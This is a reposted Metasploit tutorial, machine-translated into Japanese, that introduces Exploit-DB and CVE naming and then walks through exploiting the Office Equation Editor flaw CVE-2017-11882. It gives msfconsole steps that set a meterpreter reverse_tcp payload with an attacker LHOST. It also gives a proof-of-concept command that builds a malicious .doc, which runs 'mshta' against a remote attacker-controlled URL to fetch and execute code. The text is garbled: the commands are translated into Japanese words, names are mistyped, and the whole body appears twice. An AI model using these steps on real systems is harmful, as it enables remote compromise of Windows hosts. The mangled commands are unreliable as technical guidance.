4.Metasploitフレームワークのアップデート

Metasploitの高度な講義   フレームワークのアップデート

 

EDBのプラットフォーム- インターネットセキュリティの脆弱性データベース

 

Exploit_DBスタッフが世界中のプラットフォームのセキュリティのために提出抜け穴で、より優れた安全性試験のためのセキュリティ研究者や侵入テストエンジニアを支援しながら、企業のセキュリティ状況を改善するために企業を容易にするために、既知の脆弱性の公開アーカイブ、です。

https://www.exploit-db.com/

 

悪用:脆弱性情報

論文:関連記事

GHDB:Googleのハッキング

シェルコード:データを埋めます

 

 

CVE-2017から11882 の紹介

CVE-2017-11882Ofice 、リモートでコードが実行される脆弱性:

 

数式エディタによって引き起こさマイクロソフトオフィス、モジュールOLE(オブジェクトのリンクと埋め込みは、オブジェクトのリンクと埋め込み)技術は、バッファオーバーフローが生じ、エディタ名の長さには何のチェック以降、式のOffice文書内に埋め込まれます、特殊文字を構成することにより、攻撃者は、オフィスのオブジェクトがメモリを扱うことができない場合は正常に攻撃者はこの脆弱性を悪用現在のユーザーのためのターゲット・オペレーティング・システム上で任意のコードを実行することができるだろう。

完璧なポップは、例外なく、オフィスのフルバージョンに影響を与えます。

 

 

CVE MS

 

CVEは、共通脆弱性開示されていることを意味し、共通脆弱性の頭文字です。それは、MITREによって維持抜け穴辞書で、それぞれが共通の名前に脆弱性にさらされます。あなたはcve.mitre.org/cve/index.htmlにおける脆弱性のリストを表示することができます。

MSは、マイクロソフトの脆弱性は、独自のリストを管理しています。technet.microsoft.com/en-することができます

関連情報の最新さまざまな問い合わせ/セキュリティ/速報。

両方の基準が均一ではないので、より良い対応するために、斜め継ぎは、対応するリストcve.mitre.org/data/refs/refmap/source-MS.htmlを提供します。

 

 

MSFは追加活用し、更新Metasploitのフレームワーク

 

エクスプロイト追加します。

1. RBは、対応するフォルダにファイルをダウンロード

2. reload_allを実行するか、MSFを再起動します

 

Metasploitのフレームワークを更新します。

aptの更新;のaptインストールMetasploitのフレームワーク

 

 

実用的な操作:CVE-2017から11882ターゲットホストの使用

 

MSF:

検索2017_11882

エクスプロイト使用/窓/ ...

インフォ 

ショーのオプション

設定uripath /

設定されたペイロードの窓/ meterpreter / reverse_tcp

192.168.24.137 lhost設定

ラン

 

 

POC生成プログラム(シェルとDOCファイル):

 

パイソンCVE-2017-11882.py -c「mshta

http://192.168.24.137:8080/"-o11882.doc

  

その他のPOCプログラムが生成します。

https://github.com/Ridter/CVE-2017-11882 

python CVE-2017-11882.py-C」にcmd.exe / C

calc.cxe」-o 11882.doc

 

 

Metasploitの攻撃win8例

 

Microsoft WindowsのOLEリモートコード実行の脆弱性(CVE-2014から6332、MS14-064):

 

OLEは、(オブジェクトのリンクと埋め込み)アプリケーションがデータと機能を共有することを可能にする技術です。

マイクロソフトのWindows Server 2003 SP2、Windows VistaのSP2、Windows Server 2008の

SP2 / R2 SP1、Windows 7のSP1、Windows 8の、Windowsの8.1は、Windows Server 2012

ゴールド/ R2は、WindowsのOLEオートメーションのWindowsのRTゴールド/ 8.1バージョンでは、ユーザーがWebページを表示するためにIEブラウザを使用する場合、任意のコードのリモート実行を可能にするこの脆弱性の特別な設定ページを利用するリモートの攻撃者の実装で、リモートでコードが実行される脆弱性の配列が存在します。

 

問題が発生することがあります。

 

1.Rex :: BindFailedアドレスが使用または使用不能に既に存在する:(0.0.0.0:4444) 

    lsofを-I:4444 - >殺す-9 PID(男性用のlsof - >男性キル)

エラーメッセージ、検索および詳細を参照するには2.注意を払います

 

 

 

 

 

Metasploitのフレームワークをオープン:

 

コマンドラインモードを開始msfconsole

アーミテージは、グラフィカル・インターフェース・モードを開始します

 

Metasploitのは、第二高度を話します

フレーム更新

 

01 Exploit_db プラットフォームの紹介

02 MSFは追加エクスプロイト更新MSFを

03 CVE-2017から11882は、例を使用しています

04 コスカイネットセキュリティ研究所攻撃win8の

 

 

EDBのプラットフォーム- インターネットセキュリティの脆弱性データベース

 

Exploit_DBは、セキュリティ脆弱性の職員、世界中のプラットフォームのために提出された優れた安全性試験のためのセキュリティ研究者や侵入テストエンジニアを支援しながら、それは、企業のセキュリティ状況を改善するために企業を容易にするため、既知の脆弱性の公開アーカイブです。

 

https://www.exploit-db.com/

 

悪用:脆弱性情報

論文:関連記事

GHDB:Googleのハッキング

シェルコード:データを埋めます

 

 

CVE-2017から11882 の紹介

 

CVE-2017-11882Ofice 、リモートでコードが実行される脆弱性:

 

することで、マイクロソフトオフィスは数式エディタにモジュール内で発生するOLE オブジェクトのリンクと埋め込み、オブジェクトのリンクと埋め込み)技術は、式中に埋め込まれているOfficeのバッファオーバーフローが生じ、エディタ名の長さには何のチェック以降、文書内、特殊文字を構成することにより、攻撃者が、場合Officeが扱うことができないメモリが正しくオブジェクト攻撃者はこの脆弱性を悪用現在のユーザーのためのターゲット・オペレーティング・システム上で任意のコードを実行することができるだろう。

完璧なポップは、例外なく、影響を与えるオフィスのフルバージョンを。

 

 

CVE MS

 

CVEはある共通脆弱性共通脆弱性開示を意味し、頭字語を。それはで抜け穴辞書で、MITRE 共通名にさらされた各脆弱性のために、維持します。することができますcve.mitre.org/cve/index.html 脆弱性のリストを表示します。

 

MSは、マイクロソフトの脆弱性は、独自のリストを管理しています。ことができますtechnet.microsoft.com/en-

私たち/セキュリティ/速報関連情報の最新さまざまな。

両方の基準が均一ではないので、より良い対応するために、斜め継ぎは、対応するリスト提供cve.mitre.org/data/refs/refmap/source-MS.htmlを

 

MSFは追加活用し、更新Metasploitのフレームワーク

 

追加エクスプロイト

1. ダウンロードしたRBの対応するフォルダにファイル

2. 実行reload_all または再起動MSFを

 

更新Metasploitのフレームワークを:

aptの更新; のaptインストールMetasploitのフレームワーク

 

 

実用的な操作:CVE-2017から11882ターゲットホストの使用

 

MSF:

検索2017_11882

 

エクスプロイト使用/窓/ ...

 

インフォ

 

ショーのオプション

 

設定uripath /

 

設定されたペイロードの窓/ meterpreter / reverse_tcp

 

 192.168.24.137 lhost設定

 

ラン

 

 

POC生成プログラム(シェルとDOCファイル):

 

パイソンCVE-2017-11882.py -c「mshta

 

http://192.168.24.137:8080/"-o11882.doc

 

 

 

その他のPOCプログラムが生成します。

 

https://github.com/Ridter/CVE-2017-11882

 

python CVE-2017-11882.py-C」にcmd.exe / C

 

calc.cxe」-o 11882.doc

 

 

 

 

 

 

 

 

 

 

 

共同スカイネットセキュリティ研究所:Metasploitの攻撃win8例

 

Microsoft WindowsのOLEリモートコード実行の脆弱性(CVE-2014から6332、MS14-064):

 

 

OLEは、(オブジェクトのリンクと埋め込み)アプリケーションがデータと機能を共有することを可能にする技術です。

マイクロソフトのWindows Server 2003 SP2、Windows VistaのSP2、Windows Server 2008の

SP2 / R2 SP1、Windows 7のSP1、Windows 8の、Windowsの8.1は、Windows Server 2012

ゴールド/ R2、WindowsのOLEオートメーションは、この脆弱性の特別な設定ページを利用するリモートの攻撃者の実装で、リモートでコードが実行される脆弱性の配列が存在するのWindowsのRTゴールド/ 8.1バージョン、ユーザーがIEブラウザを使用します

任意のコード際ビューページのリモート実行を許可します。

 

 

問題が発生することがあります。

 

  1. レックスは::アドレスがすでに使用されている、または利用できないBindFailed:(0.0.0.0:4444)

 

lsofを-I:4444 - >殺す-9 PID(男性用のlsof - >男性キル)

エラーメッセージ、検索および詳細を参照するには2.注意を払います

 

 

 

 

 

Metasploitのフレームワークをオープン:

 

コマンドラインモードを開始msfconsole

 

アーミテージは、グラフィカル・インターフェース・モードを開始します

 

 

 

 

おすすめ

転載: www.cnblogs.com/lvwuwa/p/11128894.html